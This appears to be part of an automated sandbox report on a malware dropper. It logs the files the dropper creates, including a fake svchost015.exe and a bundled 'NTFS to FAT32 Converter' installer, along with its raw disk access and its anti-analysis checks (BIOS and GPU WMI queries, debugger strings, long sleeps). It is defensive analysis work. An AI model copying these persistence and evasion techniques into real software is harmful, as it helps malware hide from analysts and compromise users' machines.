                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp File created: C:\Users\user\AppData\Local\Temp\is-SVEFT.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-F178L.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-UIRHH.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\msvcr100.dll (copy)
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe File created: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe File created: C:\ProgramData\NTFS2FAT32Converter\sqlite3.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UNIQTWO[1].file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\msvcp100.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-SC9V4.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\sqlite3.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp File created: C:\Users\user\AppData\Local\is-LIN1F.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-P2BRL.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe File created: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-RFHNE.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\Qt5Concurrent.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp File created: C:\Users\user\AppData\Local\Temp\is-3RIQS.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp File created: C:\Users\user\AppData\Local\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp File created: C:\Users\user\AppData\Roaming\user32_8.drv (copy)
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe File created: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-C2IDQ.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe File created: C:\Users\user\AppData\Local\Temp\svchost015.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\Qt5PrintSupport.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\uninstall\is-AJ5Q5.tmp
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\UNIQTHREE[1].file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\icuuc51.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-VR79B.tmp
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UNIQ[1].file
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-95P8U.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\libEGL.dll (copy)
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe File created: C:\ProgramData\NTFS2FAT32Converter\NTFS2FAT32Converter.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_RegDLL.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp File created: C:\Users\user\AppData\Local\Temp\is-3RIQS.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-3S4JD.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp File created: C:\Users\user\AppData\Local\Temp\is-SVEFT.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\icuin51.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp File created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\libGLESv2.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp File created: C:\Users\user\AppData\Roaming\is-4R09J.tmp

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_02D8E8B2
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe Code function: 5_2_00401933 StartServiceCtrlDispatcherA, 5_2_00401933

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 4_2_00423C1C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_004241EC IsIconic,SetActiveWindow,SetFocus, 4_2_004241EC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_004241A4 IsIconic,SetActiveWindow, 4_2_004241A4
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 4_2_00418394
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 4_2_0042286C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 4_2_004833BC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_004175A8 IsIconic,GetCapture, 4_2_004175A8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_00417CDE IsIconic,SetWindowPos, 4_2_00417CDE
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 4_2_00417CE0
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 4_2_0041F128
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe System information queried: FirmwareTableInformation
                    Source: regsvr32.exe, 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE[;
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_02D8E9B6
                    Source: C:\Windows\SysWOW64\regsvr32.exe Code function: inet_addr,LoadLibraryA,GetBestInterface,GetProcessHeap,RtlAllocateHeap,GetAdaptersInfo,RtlReAllocateHeap,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,10_2_0277199C
                    Source: C:\Windows\SysWOW64\regsvr32.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5680
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3951
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6412
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 516
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7156
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2468
                    Source: C:\Windows\SysWOW64\regsvr32.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SVEFT.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-F178L.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-UIRHH.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\msvcr100.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\msvcp100.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-SC9V4.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-LIN1F.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-P2BRL.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-RFHNE.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\Qt5Concurrent.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3RIQS.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\user32_8.drv (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-C2IDQ.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\Qt5PrintSupport.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\uninstall\is-AJ5Q5.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\icuuc51.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-VR79B.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-95P8U.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\libEGL.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1M4E9.tmp\_isetup\_RegDLL.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3RIQS.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\is-3S4JD.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SVEFT.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\icuin51.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\libGLESv2.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-4R09J.tmp
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe Evasive API call chain: GetSystemTime,DecisionNodes
                    Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe API coverage: 5.1 %
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe TID: 8924 Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe TID: 8612 Thread sleep count: 32 > 30
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe TID: 8612 Thread sleep time: -1920000s >= -30000s
                    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 9060 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9148 Thread sleep count: 5680 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9136 Thread sleep count: 3951 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9192 Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe TID: 3712 Thread sleep time: -210000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6052 Thread sleep count: 6412 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6152 Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232 Thread sleep count: 516 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4480 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 7156 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6476 Thread sleep count: 2468 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6264 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe File opened: PhysicalDrive0
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe Last function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Code function: 1_2_100081AE FindFirstFileExW,1_2_100081AE
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_00452A4C FindFirstFileA,GetLastError,4_2_00452A4C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,4_2_004751F8
